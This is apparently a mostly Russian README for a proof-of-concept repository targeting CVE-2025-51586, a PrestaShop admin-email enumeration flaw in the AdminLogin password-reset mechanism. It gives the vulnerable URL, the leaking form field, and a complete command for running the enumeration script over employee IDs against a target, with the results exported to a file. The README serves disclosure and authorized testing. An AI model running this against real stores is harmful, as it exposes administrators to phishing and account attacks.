
PrestaShop AdminLogin Email Enumeration PoC - CVE-2025-51586. This repository provides an ethical Proof-of-Concept (PoC) for the PrestaShop vulnerability allowing user enumeration through the AdminLogin password reset mechanism. It explains the impact, setup, and usage of the PoC script.
Этот репозиторий содержит этический Proof-of-Concept (PoC) для уязвимости CVE-2025-51586, затрагивающей PrestaShop версий 1.7.x — 8.2.2.
PoC перечисляет email-адреса администраторов через механизм сброса пароля Back Office (контроллер AdminLogin).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee и недействительный reset_token<input name="reset_email" value="[email protected]">Официальное уведомление: Friends of Presta Security
Обнаружено командой Friends of Presta Security Team (уведомление опубликовано 4 сентября 2025 года).
Этот PoC предназначен только для образовательных целей и авторизованного тестирования. Используйте только на системах, которыми вы владеете, или при наличии явного разрешения. Автор и участники не несут ответственности за неправомерное использование.
Клонируйте репозиторий и установите зависимости:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC разработан 7h30th3r0n3. Уязвимость обнаружена командой Friends of Presta Security Team.